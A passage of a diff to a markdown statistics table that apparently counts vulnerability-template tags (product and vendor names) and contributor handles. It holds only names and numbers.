(strobes security) | 1 | | | | | | | -| prtg | 4 | viniciuspereiras | 1 | | | | | | | -| newstatpress_project | 4 | zandros0 | 1 | | | | | | | -| sigb | 4 | mrcl0wnlab | 1 | | | | | | | -| datadog | 4 | zsusac | 1 | | | | | | | -| veronalabs | 4 | axrk | 1 | | | | | | | -| shiro | 4 | iampritam | 1 | | | | | | | -| mailchimp | 4 | y0no | 1 | | | | | | | -| centos | 4 | wlayzz | 1 | | | | | | | -| esri | 4 | therealtoastycat | 1 | | | | | | | -| candidats | 4 | mantissts | 1 | | | | | | | -| djangoproject | 4 | patralos | 1 | | | | | | | -| okta | 4 | mohammedsaneem | 1 | | | | | | | -| auieo | 4 | danigoland | 1 | | | | | | | -| subrion | 4 | petruknisme | 1 | | | | | | | -| httpd | 4 | kaizensecurity | 1 | | | | | | | -| kyocera | 4 | arjunchandarana | 1 | | | | | | | -| aria | 4 | retr0 | 1 | | | | | | | -| linksys | 4 | f0xy | 1 | | | | | | | -| webshell | 4 | queencitycyber | 1 | | | | | | | -| consul | 4 | akash.c | 1 | | | | | | | -| d-link | 4 | remi gascou (podalirius) | 1 | | | | | | | -| rabbitmq | 4 | b0rn2r00t | 1 | | | | | | | -| jorani | 4 | jcockhren | 1 | | | | | | | -| zend | 4 | professorabhay | 1 | | | | | | | -| flickr | 4 | pphuahua | 1 | | | | | | | -| ray | 4 | jeya seelan | 1 | | | | | | | -| confluent | 4 | mbmy | 1 | | | | | | | -| bamboo | 4 | xc1ym | 1 | | | | | | | -| pie-register | 4 | drfabiocastro | 1 | | | | | | | -| cnvd2022 | 4 | floriandewald | 1 | | | | | | | -| osint-archived | 4 | regala_ | 1 | | | | | | | -| harmistechnology | 4 | xshuden | 1 | | | | | | | -| octoprint | 3 | brabbit10 | 1 | | | | | | | -| spotify | 3 | af001 | 1 | | | | | | | -| passive | 3 | noamrathaus | 1 | | | | | | | -| dokuwiki | 3 | hüseyin tintaş | 1 | | | | | | | -| redash | 3 | 5up3r541y4n | 1 | | | | | | | -| favicon | 3 | mah3sec_ | 1 | | | | | | | -| webnus | 3 | sanineng | 1 | | | | | | | -| nifi | 3 | mesaglio | 1 | | | | | | | -| dev.pucit.edu.pk | 3 | ayadi | 1 | | | | | | | -| targa | 3 | juliosmelo | 1 | | | | | | | -| passcv | 3 | win3zz | 1 | | | | | | | -| digitalrebar | 3 | remonsec | 1 | | | | | | | -| sitemap | 3 | cravaterouge | 1 | | | | | | | -| postman | 3 | httpvoid | 1 | | | | | | | -| strangerstudios | 3 | galoget | 1 | | | | | | | -| instagram | 3 | lark lab | 1 | | | | | | | -| ueditor | 3 | ilovebinbash | 1 | | | | | | | -| flutter | 3 | kresec | 1 | | | | | | | -| aptus | 3 | kchason | 1 | | | | | | | -| axis | 3 | clment cruchet | 1 | | | | | | | -| bash | 3 | sw0rk17 | 1 | | | | | | | -| nuxtjs | 3 | couskito | 1 | | | | | | | -| chatgpt | 3 | stupidfish | 1 | | | | | | | -| ixcache | 3 | kiransau | 1 | | | | | | | -| thefactory | 3 | unknown | 1 | | | | | | | -| grp | 3 | sec_hawk | 1 | | | | | | | -| hfs | 3 | calumjelrick | 1 | | | | | | | -| cloudwatch | 3 | evan rubinstien | 1 | | | | | | | -| xerox | 3 | hardik-rathod | 1 | | | | | | | -| mapbox | 3 | yiran | 1 | | | | | | | -| saltstack | 3 | udyz | 1 | | | | | | | -| modem | 3 | themiddle | 1 | | | | | | | -| etsy | 3 | ooooooo_q | 1 | | | | | | | -| weiphp | 3 | danfaizer | 1 | | | | | | | -| steve | 3 | official_blackhat13 | 1 | | | | | | | -| selea | 3 | nytr0gen | 1 | | | | | | | -| structurizr | 3 | mchklt | 1 | | | | | | | -| yii | 3 | william söderberg @ withsecure | 1 | | | | | | | -| adiscon | 3 | jiheon-dev | 1 | | | | | | | -| clientid | 3 | 1nf1n7y | 1 | | | | | | | -| truenas | 3 | manasmbellani | 1 | | | | | | | -| webtareas | 3 | adamparsons | 1 | | | | | | | -| bitrix24 | 3 | xstp | 1 | | | | | | | -| processwire | 3 | high | 1 | | | | | | | -| synology | 3 | jteles | 1 | | | | | | | -| waf | 3 | arqsz | 1 | | | | | | | -| temenos | 3 | push4d | 1 | | | | | | | -| carel | 3 | sdcampbell | 1 | | | | | | | -| e-mobile | 3 | dawid-czarnecki | 1 | | | | | | | -| petya | 3 | abdullahisik | 1 | | | | | | | -| h2o | 3 | 0h1in9e | 1 | | | | | | | -| cas | 3 | anon-artist | 1 | | | | | | | -| empirecms | 3 | hyunsoo-ds | 1 | | | | | | | -| dotcms | 3 | houdinis | 1 | | | | | | | -| avada | 3 | jaskaran | 1 | | | | | | | -| dos | 3 | berkdusunur | 1 | | | | | | | -| lansweeper | 3 | apt-mirror | 1 | | | | | | | -| watchguard | 3 | banana69 | 1 | | | | | | | -| rlm | 3 | adilsoybali | 1 | | | | | | | -| revive | 3 | exid | 1 | | | | | | | -| qlik | 3 | jfbes | 1 | | | | | | | -| idrac | 3 | higor melgaço (eremit4) | 1 | | | | | | | -| particle | 3 | sinsinology | 1 | | | | | | | -| i3geo | 3 | patrick pirker | 1 | | | | | | | -| ampps | 3 | metascan | 1 | | | | | | | -| influxdb | 3 | pjborah | 1 | | | | | | | -| jeedom | 3 | thirukrishnan | 1 | | | | | | | -| finecms | 3 | djoevanka | 1 | | | | | | | -| pypi | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| backdrop | 3 | vikas kundu | 1 | | | | | | | -| cpanel | 3 | petergrifin | 1 | | | | | | | -| thruk | 3 | harshinsecurity | 1 | | | | | | | -| zeroshell | 3 | justmumu | 1 | | | | | | | -| webkul-qloapps | 3 | adnanekhan | 1 | | | | | | | -| esafenet | 3 | ahmetpergamum | 1 | | | | | | | -| neo4j | 3 | sechunt3r | 1 | | | | | | | -| veeam | 3 | knassar702 | 1 | | | | | | | -| circleci | 3 | lethargynavigator | 1 | | | | | | | -| xoops | 3 | miroslavsotak | 1 | | | | | | | -| dvr | 3 | k3rwin | 1 | | | | | | | -| siemens | 3 | bjhulst | 1 | | | | | | | -| messaging | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| diagrams | 3 | manuelbua | 1 | | | | | | | -| lighttpd | 3 | booboohq | 1 | | | | | | | -| switch | 3 | shockwave | 1 | | | | | | | -| sofacy | 3 | luqmaan hadia | 1 | | | | | | | +| chamilo | 6 | unp4ck | 1 | | | | | | | +| doctor_appointment_system_project | 6 | jub0bs | 1 | | | | | | | +| typo3 | 6 | af001 | 1 | | | | | | | +| security | 6 | m0ck3d | 1 | | | | | | | +| server | 6 | miroslavsotak | 1 | | | | | | | +| openvpn | 6 | pastaga | 1 | | | | | | | +| jamf | 6 | rodnt | 1 | | | | | | | +| cobbler | 6 | omarkurt | 1 | | | | | | | +| elfinder | 6 | shiva (strobes security) | 1 | | | | | | | +| online-fire-reporting | 6 | compr00t | 1 | | | | | | | +| zhiyuan | 6 | cravaterouge | 1 | | | | | | | +| keycloak | 6 | yashvardhantripathi | 1 | | | | | | | +| openai | 6 | s1r1u5_ | 1 | | | | | | | +| magmi | 6 | tirtha | 1 | | | | | | | +| webmin | 6 | banana69 | 1 | | | | | | | +| plesk | 6 | notsoevilweasel | 1 | | | | | | | +| minio | 6 | opencirt | 1 | | | | | | | +| express | 6 | jna1 | 1 | | | | | | | +| jeecg | 6 | manasmbellani | 1 | | | | | | | +| flutterwave | 6 | thebinitghimire | 1 | | | | | | | +| doctor-appointment-system | 6 | th3r4id | 1 | | | | | | | +| sql | 6 | kabirsuda | 1 | | | | | | | +| online_fire_reporting_system_project | 6 | udinchan | 1 | | | | | | | +| tikiwiki | 6 | dmartyn | 1 | | | | | | | +| sonarqube | 6 | act1on3 | 1 | | | | | | | +| advantech | 6 | drfabiocastro | 1 | | | | | | | +| h3c | 6 | pussycat0 | 1 | | | | | | | +| http | 5 | michal-mikolas | 1 | | | | | | | +| asana | 5 | abdullahisik | 1 | | | | | | | +| axigen | 5 | thelicato | 1 | | | | | | | +| schneider-electric | 5 | babybash | 1 | | | | | | | +| digitaldruid | 5 | esonhugh | 1 | | | | | | | +| qdpm | 5 | aron molnar | 1 | | | | | | | +| hybris | 5 | therealtoastycat | 1 | | | | | | | +| resin | 5 | zsusac | 1 | | | | | | | +| mssql | 5 | zn9988 | 1 | | | | | | | +| totolink | 5 | kaizensecurity | 1 | | | | | | | +| webview | 5 | ransomsec | 1 | | | | | | | +| 10web | 5 | exploitation | 1 | | | | | | | +| connectwise | 5 | 1nf1n7y | 1 | | | | | | | +| metinfo | 5 | myst7ic | 1 | | | | | | | +| acm | 5 | mordavid | 1 | | | | | | | +| react | 5 | duty_1g | 1 | | | | | | | +| rseenet | 5 | sickwell | 1 | | | | | | | +| cve2007 | 5 | miryangjung | 1 | | | | | | | +| cdata | 5 | alexrydzak | 1 | | | | | | | +| circontrol | 5 | hardik-rathod | 1 | | | | | | | +| telerik | 5 | 0xcharan | 1 | | | | | | | +| circarlife | 5 | ayadi | 1 | | | | | | | +| tibco | 5 | httpvoid | 1 | | | | | | | +| jupyter | 5 | _c0wb0y_ | 1 | | | | | | | +| square | 5 | iphantasmic | 1 | | | | | | | +| api-server | 5 | luqmaan hadia | 1 | | | | | | | | | | [luqiih](https://github.com/luqiih) | | | | | | | | -| fastly | 3 | puben | 1 | | | | | | | -| digital-watchdog | 3 | napgh0st | 1 | | | | | | | -| softwarepublico | 3 | miguelsegoviagil | 1 | | | | | | | -| apple | 3 | orpheus | 1 | | | | | | | -| javascript | 3 | vthiery | 1 | | | | | | | -| netfortris | 3 | skylark-lab | 1 | | | | | | | -| sharp | 3 | rotemreiss | 1 | | | | | | | -| superadmin | 3 | aayush vishnoi | 1 | | | | | | | -| contentful | 3 | qlkwej | 1 | | | | | | | -| wwbn | 3 | jas37 | 1 | | | | | | | -| superset | 3 | bernardo rodrigues | 1 | | | | | | | +| wbce | 5 | 0xd0ff9 | 1 | | | | | | | +| voip | 5 | vinit989 | 1 | | | | | | | +| firmware | 5 | paper-pen | 1 | | | | | | | +| vehicle_service_management_system_project | 5 | elouhi | 1 | | | | | | | +| sentry | 5 | lingtren | 1 | | | | | | | +| gocd | 5 | 0xh7ml | 1 | | | | | | | +| pyload | 5 | shelld3v | 1 | | | | | | | +| dolibarr | 5 | stux | 1 | | | | | | | +| carrental | 5 | barthy.koeln | 1 | | | | | | | +| cloudflare | 5 | josecosta | 1 | | | | | | | +| etcd | 5 | remonsec | 1 | | | | | | | +| open-emr | 5 | husain | 1 | | | | | | | +| matrix | 5 | arr0way | 1 | | | | | | | +| agentejo | 5 | mrcl0wnlab | 1 | | | | | | | +| jwt | 5 | ringo | 1 | | | | | | | +| genetechsolutions | 5 | sec_hawk | 1 | | | | | | | +| percha | 5 | 0xparth | 1 | | | | | | | +| terramaster | 5 | danigoland | 1 | | | | | | | +| learnpress | 5 | f1she3 | 1 | | | | | | | +| adb | 5 | clment cruchet | 1 | | | | | | | +| nuuo | 5 | whynotke | 1 | | | | | | | +| openfire | 5 | eremit4 | 1 | | | | | | | +| parallels | 5 | ph33rr | 1 | | | | | | | +| zzzcms | 5 | sshell | 1 | | | | | | | +| dionaea | 5 | imhunterand | 1 | | | | | | | +| ems | 5 | w8ay | 1 | | | | | | | +| swagger | 5 | exceed | 1 | | | | | | | +| caucho | 5 | fq_hsu | 1 | | | | | | | +| apisix | 5 | aravind | 1 | | | | | | | +| papercut | 5 | apple | 1 | | | | | | | +| hpe | 5 | j3ssie/geraldino2 | 1 | | | | | | | +| blackenergy | 5 | pdp | 1 | | | | | | | +| qnap | 5 | orpheus | 1 | | | | | | | +| thedigitalcraft | 5 | d0rkerdevil | 1 | | | | | | | +| openstack | 5 | sak1 | 1 | | | | | | | +| sysaid | 5 | aresx | 1 | | | | | | | +| tenda | 5 | patralos | 1 | | | | | | | +| strapi | 5 | piyushchhiroliya | 1 | | | | | | | +| elementor | 5 | rivalsec | 1 | | | | | | | +| crushftp | 5 | hyunsoo-ds | 1 | | | | | | | +| glpi-project | 5 | higor melgaço (eremit4) | 1 | | | | | | | +| apollo | 5 | pepitoh | 1 | | | | | | | +| fatpipe | 5 | yiran | 1 | | | | | | | +| wpdevart | 5 | jiheon-dev | 1 | | | | | | | +| webkul | 5 | abut0n | 1 | | | | | | | +| kkfileview | 5 | christbowel | 1 | | | | | | | +| froxlor | 5 | luciannitescu | 1 | | | | | | | +| awstats | 5 | sanineng | 1 | | | | | | | +| sftp | 5 | dk999 | 1 | | | | | | | +| ethereum | 5 | kresec | 1 | | | | | | | +| graylog | 5 | pphuahua | 1 | | | | | | | +| jabber | 5 | kiransau | 1 | | | | | | | +| checkpoint | 5 | alperenkesk | 1 | | | | | | | +| redmine | 5 | jeya.seelan | 1 | | | | | | | +| goanywhere | 5 | b4uh0lz | 1 | | | | | | | +| storage | 5 | archer | 1 | | | | | | | +| adminer | 5 | _harleo | 1 | | | | | | | +| gnu | 5 | arjunchandarana | 1 | | | | | | | +| mantisbt | 5 | unkl4b | 1 | | | | | | | +| avaya | 5 | zeyad azima | 1 | | | | | | | +| web3 | 5 | tehtbl | 1 | | | | | | | +| spark | 5 | hanlaomo | 1 | | | | | | | +| xmlrpc | 5 | ptonewreckin | 1 | | | | | | | +| decision-center | 5 | defektive | 1 | | | | | | | +| password | 5 | ahmed abou-ela | 1 | | | | | | | +| magmi_project | 5 | pry0cc | 1 | | | | | | | +| akamai | 5 | dale clarke | 1 | | | | | | | +| hoteldruid | 5 | smaranchand | 1 | | | | | | | +| eclipse | 4 | colbyjack1134 | 1 | | | | | | | +| metabase | 4 | xshuden | 1 | | | | | | | +| mcafee | 4 | push4d | 1 | | | | | | | +| ampache | 4 | shockwave | 1 | | | | | | | +| artifactory | 4 | professorabhay | 1 | | | | | | | +| supsystic | 4 | axrk | 1 | | | | | | | +| pluginus | 4 | dhiyanesdk | 1 | | | | | | | +| churchcrm | 4 | wabafet | 1 | | | | | | | +| centos | 4 | ok_bye_now | 1 | | | | | | | +| info | 4 | 8authur | 1 | | | | | | | +| mostracms | 4 | majidmc2 | 1 | | | | | | | +| jfrog | 4 | regala_ | 1 | | | | | | | +| okta | 4 | 0xceba | 1 | | | | | | | +| sugarcrm | 4 | sdcampbell | 1 | | | | | | | +| ternaria | 4 | noamrathaus | 1 | | | | | | | +| moveit | 4 | kiks7 | 1 | | | | | | | +| telegram | 4 | droberson | 1 | | | | | | | +| harmistechnology | 4 | pjborah | 1 | | | | | | | +| casaos | 4 | momen eldawakhly | 1 | | | | | | | +| grav | 4 | wpsec | 1 | | | | | | | +| cnvd2019 | 4 | rumble773 | 1 | | | | | | | +| gnuboard | 4 | apt-mirror | 1 | | | | | | | +| cnvd2022 | 4 | anonymous | 1 | | | | | | | +| arcgis | 4 | udyz | 1 | | | | | | | +| reprisesoftware | 4 | kailashbohara | 1 | | | | | | | +| esri | 4 | juliosmelo | 1 | | | | | | | +| salesforce | 4 | dorkerdevil | 1 | | | | | | | +| pentaho | 4 | chron0x | 1 | | | | | | | +| bitrix | 4 | justmumu | 1 | | | | | | | +| prtg | 4 | unblvr1 | 1 | | | | | | | +| metersphere | 4 | yuansec | 1 | | | | | | | +| candidats | 4 | notwhy | 1 | | | | | | | +| newstatpress | 4 | wlayzz | 1 | | | | | | | +| kibana | 4 | adilsoybali | 1 | | | | | | | +| mostra | 4 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | | | | | | | | -| hsphere | 3 | w0tx | 1 | | | | | | | -| telnet | 3 | higor melgaço | 1 | | | | | | | -| ansible | 3 | kba@sogeti_esec | 1 | | | | | | | -| superwebmailer | 3 | denandz | 1 | | | | | | | -| suitecrm | 3 | unblvr1 | 1 | | | | | | | -| flexvnf | 3 | ringo | 1 | | | | | | | -| cdn | 3 | natto97 | 1 | | | | | | | -| octobercms | 3 | myst7ic | 1 | | | | | | | -| key | 3 | dhiyanesdk | 1 | | | | | | | -| monitorr | 3 | nuts7 | 1 | | | | | | | -| default | 3 | zinminphy0 | 1 | | | | | | | -| listserv | 3 | thebinitghimire | 1 | | | | | | | -| cluster | 3 | naglis | 1 | | | | | | | -| magnolia | 3 | mukundbhuva | 1 | | | | | | | -| geowebserver | 3 | osamahamad | 1 | | | | | | | -| imap | 3 | _c0wb0y_ | 1 | | | | | | | -| sns | 3 | pratik khalane | 1 | | | | | | | -| intercom | 3 | fpatrik | 1 | | | | | | | -| graph | 3 | yusakie | 1 | | | | | | | -| sharepoint | 3 | sickwell | 1 | | | | | | | -| backdropcms | 3 | blckraven | 1 | | | | | | | -| sidekiq | 3 | zhenwarx | 1 | | | | | | | -| newsletter | 3 | nobody | 1 | | | | | | | -| projectsend | 3 | ok_bye_now | 1 | | | | | | | -| electron | 3 | vulnspace | 1 | | | | | | | -| rstudio | 3 | jrolf | 1 | | | | | | | -| kavita | 3 | husain | 1 | | | | | | | -| gvectors | 3 | wabafet | 1 | | | | | | | -| droneci | 3 | b0yd | 1 | | | | | | | -| wpdeveloper | 3 | wpsec | 1 | | | | | | | -| afterlogic | 3 | droberson | 1 | | | | | | | -| evlink | 3 | kailashbohara | 1 | | | | | | | -| automattic | 3 | bjxsec | 1 | | | | | | | -| lotus | 3 | lingtren | 1 | | | | | | | -| copyparty | 3 | exploitation | 1 | | | | | | | -| learndash | 3 | lady_bug | 1 | | | | | | | -| xxljob | 3 | aaban solutions | 1 | | | | | | | -| inspur | 3 | fur1na | 1 | | | | | | | -| opencart | 3 | geraldino2 | 1 | | | | | | | -| voipmonitor | 3 | compr00t | 1 | | | | | | | -| actuator | 3 | charanrayudu | 1 | | | | | | | -| rancher | 3 | noobexploiter | 1 | | | | | | | -| selenium | 3 | elitebaz | 1 | | | | | | | -| revive-adserver | 3 | 0xrod | 1 | | | | | | | -| openam | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| webcam | 3 | dwbzn | 1 | | | | | | | -| self-hosted | 3 | shifacyclewla | 1 | | | | | | | -| jitsi | 3 | th3.d1p4k | 1 | | | | | | | -| tautulli | 3 | udinchan | 1 | | | | | | | -| gibbon | 3 | hateshape | 1 | | | | | | | -| forum | 3 | andirrahmani1 | 1 | | | | | | | -| yzmcms | 3 | kareemse1im | 1 | | | | | | | -| shell | 3 | aceseven (digisec360) | 1 | | | | | | | -| cybelesoft | 3 | mhdsamx | 1 | | | | | | | -| qts | 3 | mammad_rahimzada | 1 | | | | | | | -| casdoor | 3 | joaonevess | 1 | | | | | | | -| jeesns | 3 | sherlocksecurity | 1 | | | | | | | -| zeit | 3 | mariam tariq | 1 | | | | | | | -| woodwing | 3 | s1r1us | 1 | | | | | | | -| rpm | 3 | matt miller | 1 | | | | | | | -| teampass | 3 | nan-kl | 1 | | | | | | | -| limesurvey | 3 | ransomsec | 1 | | | | | | | -| 3cx | 3 | rumble773 | 1 | | | | | | | -| zendesk | 3 | bughuntersurya | 1 | | | | | | | -| loytec | 3 | jna1 | 1 | | | | | | | -| segment | 3 | ling | 1 | | | | | | | -| western_digital | 3 | alex | 1 | | | | | | | -| axway | 3 | shivanshkhari | 1 | | | | | | | -| school_dormitory_management_system_project | 3 | | | | | | | | | -| getsimple | 3 | | | | | | | | | -| glassfish | 3 | | | | | | | | | -| ithemes | 3 | | | | | | | | | -| zerof | 3 | | | | | | | | | -| ruckuswireless | 3 | | | | | | | | | -| discourse | 3 | | | | | | | | | -| nortek | 3 | | | | | | | | | -| httpbin | 3 | | | | | | | | | -| rackn | 3 | | | | | | | | | -| mpsec | 3 | | | | | | | | | -| axis2 | 3 | | | | | | | | | -| std42 | 3 | | | | | | | | | -| anonymous | 3 | | | | | | | | | -| rubygems | 3 | | | | | | | | | -| e-cology | 3 | | | | | | | | | -| monitor | 3 | | | | | | | | | +| gradle | 4 | narluin | 1 | | | | | | | +| thimpress | 4 | drewvravick | 1 | | | | | | | +| zte | 4 | ahmed sherif | 1 | | | | | | | +| mooveagency | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| httpserver | 4 | carrot2 | 1 | | | | | | | +| djangoproject | 4 | diablo | 1 | | | | | | | +| consul | 4 | jacalynli | 1 | | | | | | | +| yeswiki | 4 | arall | 1 | | | | | | | +| codoso | 4 | xcapri | 1 | | | | | | | +| kevinlab | 4 | jaimin gondaliya | 1 | | | | | | | +| seagate | 4 | miguelsegoviagil | 1 | | | | | | | +| harbor | 4 | viondexd | 1 | | | | | | | +| thinkcmf | 4 | yashanand155 | 1 | | | | | | | +| sigb | 4 | michael wedl | 1 | | | | | | | +| d-link | 4 | j33n1k4 | 1 | | | | | | | +| stripe | 4 | bugvsme | 1 | | | | | | | +| ebs | 4 | viniciuspereiras | 1 | | | | | | | +| containers | 4 | daviey | 1 | | | | | | | +| env | 4 | dievus | 1 | | | | | | | +| flink | 4 | zinminphy0 | 1 | | | | | | | +| juniper | 4 | domenicoveneziano | 1 | | | | | | | +| finicity | 4 | charanrayudu | 1 | | | | | | | +| imgproxy | 4 | bibeksapkota (sar00n) | 1 | | | | | | | +| zend | 4 | k3rwin | 1 | | | | | | | +| cve2005 | 4 | zhenwarx | 1 | | | | | | | +| kentico | 4 | open-sec | 1 | | | | | | | +| rocketchat | 4 | gboddin | 1 | | | | | | | +| eyoucms | 4 | ynnirc | 1 | | | | | | | +| audiocodes | 4 | fmunozs | 1 | | | | | | | +| osgeo | 4 | remi gascou (podalirius) | 1 | | | | | | | +| codeigniter | 4 | infosecsanyam | 1 | | | | | | | +| temenos | 4 | mchklt | 1 | | | | | | | +| phpjabber | 4 | jc175 | 1 | | | | | | | +| confluent | 4 | savik | 1 | | | | | | | +| hongdian | 4 | ola456 | 1 | | | | | | | +| owncloud | 4 | jteles | 1 | | | | | | | +| igniterealtime | 4 | vince-isec | 1 | | | | | | | +| joomlamo | 4 | adeljck | 1 | | | | | | | +| heroku | 4 | yusakie | 1 | | | | | | | +| horde | 4 | sorrowx3 | 1 | | | | | | | +| phppgadmin | 4 | yhy0 | 1 | | | | | | | +| panabit | 4 | kareemse1im | 1 | | | | | | | +| pip | 4 | undefl0w | 1 | | | | | | | +| linkerd | 4 | hexcat | 1 | | | | | | | +| sendgrid | 4 | phyr3wall | 1 | | | | | | | +| myeventon | 4 | pratik khalane | 1 | | | | | | | +| mitel | 4 | yavolo | 1 | | | | | | | +| bittrex | 4 | qlkwej | 1 | | | | | | | +| webshell | 4 | tirtha_mandal | 1 | | | | | | | +| easypost | 4 | kishore krishna (sillydaddy) | 1 | | | | | | | +| panos | 4 | revblock | 1 | | | | | | | +| ghost | 4 | godfatherorwa | 1 | | | | | | | +| terra-master | 4 | dwbzn | 1 | | | | | | | +| osint-archived | 4 | evan rubinstien | 1 | | | | | | | +| angular | 4 | youngpope | 1 | | | | | | | +| tiki | 4 | hel10-web | 1 | | | | | | | +| jsf | 4 | intx0x80 | 1 | | | | | | | +| ransomware | 4 | yashgoti | 1 | | | | | | | +| kyocera | 4 | jbertman | 1 | | | | | | | +| ad | 4 | _darrenmartyn | 1 | | | | | | | +| jorani | 4 | carson chan | 1 | | | | | | | +| kingsoft | 4 | kagamigawa | 1 | | | | | | | +| springcloud | 4 | anon-artist | 1 | | | | | | | +| aura | 4 | nan-kl | 1 | | | | | | | +| age-encryption | 4 | rschio | 1 | | | | | | | +| mautic | 4 | zandros0 | 1 | | | | | | | +| piwigo | 4 | luqman | 1 | | | | | | | +| flatpress | 4 | xstp | 1 | | | | | | | +| rabbitmq | 4 | technicaljunkie | 1 | | | | | | | +| datadog | 4 | andysvints | 1 | | | | | | | +| hongfan | 4 | mys7ic | 1 | | | | | | | +| flickr | 4 | 0xprial | 1 | | | | | | | +| proftpd | 4 | aayush vishnoi | 1 | | | | | | | +| articatech | 4 | fopina | 1 | | | | | | | +| photo | 4 | metascan | 1 | | | | | | | +| pixie | 4 | marcos_iaf | 1 | | | | | | | +| pega | 4 | 0xelkomy & c0nqr0r | 1 | | | | | | | +| creativeitem | 4 | retr02332 | 1 | | | | | | | +| powerjob | 4 | nytr0gen | 1 | | | | | | | +| globalprotect | 4 | nuts7 | 1 | | | | | | | +| os4ed | 4 | noobexploiter | 1 | | | | | | | +| pmb_project | 4 | mass0ma | 1 | | | | | | | +| auieo | 4 | 0xtavian | 1 | | | | | | | +| roxy | 4 | elmahdi | 1 | | | | | | | +| postmessage | 4 | mariam tariq | 1 | | | | | | | +| dahuasecurity | 4 | b0rn2r00t | 1 | | | | | | | +| metasploit | 4 | r3nz0 | 1 | | | | | | | +| shiro | 4 | ofjaaah | 1 | | | | | | | +| rubyonrails | 4 | dawid-czarnecki | 1 | | | | | | | +| figma | 4 | liquidsec | 1 | | | | | | | +| httpd | 4 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| aspose | 4 | f0xy | 1 | | | | | | | +| intelbras | 4 | 0h1in9e | 1 | | | | | | | +| sound4 | 4 | aaban solutions | 1 | | | | | | | +| puppet | 4 | themiddle | 1 | | | | | | | +| umbraco | 4 | h4sh5 | 1 | | | | | | | +| jellyfin | 4 | n0el4kls | 1 | | | | | | | +| aria | 4 | sicksec | 1 | | | | | | | +| subrion | 4 | jeya seelan | 1 | | | | | | | +| linksys | 4 | shreyapohekar | 1 | | | | | | | +| fit2cloud | 4 | byobin | 1 | | | | | | | +| opencms | 4 | ldionmarcil | 1 | | | | | | | +| wcs | 4 | nobody | 1 | | | | | | | +| concrete | 4 | mubassirpatel | 1 | | | | | | | +| newstatpress_project | 4 | mammad_rahimzada | 1 | | | | | | | +| veronalabs | 4 | couskito | 1 | | | | | | | +| wp-statistics | 4 | lethargynavigator | 1 | | | | | | | +| dom | 4 | calumjelrick | 1 | | | | | | | +| search | 4 | jaskaran | 1 | | | | | | | +| pie-register | 4 | 5up3r541y4n | 1 | | | | | | | +| webmail | 4 | david botelho mariano | 1 | | | | | | | +| mailchimp | 4 | rubina119 | 1 | | | | | | | +| bamboo | 4 | becivells | 1 | | | | | | | +| nosqli | 4 | freakyclown | 1 | | | | | | | +| linuxfoundation | 4 | akokonunes | 1 | | | | | | | +| royalevent | 4 | marcio mendes | 1 | | | | | | | +| hospital_management_system_project | 4 | absshax | 1 | | | | | | | +| dotnet | 4 | osamahamad | 1 | | | | | | | +| ray | 4 | defte | 1 | | | | | | | +| wireguard | 4 | bywalks | 1 | | | | | | | +| sharepoint | 3 | mohammad reza omrani | | 1 | | | | | | | +| | | @omranisecurity | | | | | | | | +| hsphere | 3 | vikas kundu | 1 | | | | | | | +| hfs | 3 | adnanekhan | 1 | | | | | | | +| finecms | 3 | rinolock | 1 | | | | | | | +| gibbon | 3 | jrolf | 1 | | | | | | | +| itop | 3 | amirmsafari | 1 | | | | | | | +| kfm | 3 | vzamanillo | 1 | | | | | | | +| esafenet | 3 | bughuntersurya | 1 | | | | | | | +| limesurvey | 3 | ramondunker | 1 | | | | | | | +| octoprint | 3 | ooooooo_q | 1 | | | | | | | +| bigant | 3 | w0tx | 1 | | | | | | | +| forgerock | 3 | exid | 1 | | | | | | | +| geowebserver | 3 | breno_css | 1 | | | | | | | +| messaging | 3 | ap3r | 1 | | | | | | | +| grp | 3 | olewagner | 1 | | | | | | | +| axis | 3 | ahmetpergamum | 1 | | | | | | | +| wwbn | 3 | mihhailsokolov | 1 | | | | | | | +| mythic | 3 | hlop | 1 | | | | | | | +| modoboa | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| bitrix24 | 3 | arqsz | 1 | | | | | | | +| mojoportal | 3 | hüseyin tintaş | 1 | | | | | | | +| petya | 3 | pudsec | 1 | | | | | | | +| inspur | 3 | unknown | 1 | | | | | | | +| segment | 3 | danfaizer | 1 | | | | | | | +| soplanning | 3 | watchtowr | 1 | | | | | | | +| voipmonitor | 3 | luskabol | 1 | | | | | | | +| dotnetnuke | 3 | carlosvieira | 1 | | | | | | | +| epson | 3 | yaser_s | 1 | | | | | | | +| qts | 3 | elitebaz | 1 | | | | | | | +| veeam | 3 | kurohost | 1 | | | | | | | +| covenant | 3 | null_hypothesis | 1 | | | | | | | +| postman | 3 | pwnwithlove | 1 | | | | | | | +| cybelesoft | 3 | houdinis | 1 | | | | | | | +| modem | 3 | luqmaan hadia | 1 | | | | | | | +| openam | 3 | higor melgaço | 1 | | | | | | | +| diagrams | 3 | lambdasawa | 1 | | | | | | | +| freshrss | 3 | harryha | 1 | | | | | | | +| netdata | 3 | un-fmunozs | 1 | | | | | | | +| rackn | 3 | makyotox | 1 | | | | | | | +| rancher | 3 | philippdelteil | 1 | | | | | | | +| monitor | 3 | johndoeanonita | 1 | | | | | | | +| self-hosted | 3 | xiaowangsec | 1 | | | | | | | +| openbmcs | 3 | d4ly | 1 | | | | | | | +| sonatype | 3 | thirukrishnan | 1 | | | | | | | +| zerof | 3 | am0nt31r0 | 1 | | | | | | | +| saltstack | 3 | amnotacat | 1 | | | | | | | +| default | 3 | none | 1 | | | | | | | +| suitecrm | 3 | sospiro | 1 | | | | | | | +| afterlogic | 3 | sherlocksecurity | 1 | | | | | | | +| rlm | 3 | izn0u | 1 | | | | | | | +| jeesns | 3 | william söderberg @ withsecure | 1 | | | | | | | +| payara | 3 | harshinsecurity | 1 | | | | | | | +| nuget | 3 | vulnspace | 1 | | | | | | | +| label-studio | 3 | 0ut0fb4nd | 1 | | | | | | | +| automattic | 3 | bad5ect0r | 1 | | | | | | | +| droneci | 3 | joanbonon | 1 | | | | | | | +| sudo | 3 | brabbit10 | 1 | | | | | | | +| dos | 3 | ledoubletake | 1 | | | | | | | +| strangerstudios | 3 | s1r1us | 1 | | | | | | | +| phpipam | 3 | hotpot | 1 | | | | | | | +| telnet | 3 | rotembar | 1 | | | | | | | +| passcv | 3 | natto97 | 1 | | | | | | | +| buffalo | 3 | efran | 1 | | | | | | | +| contribsys | 3 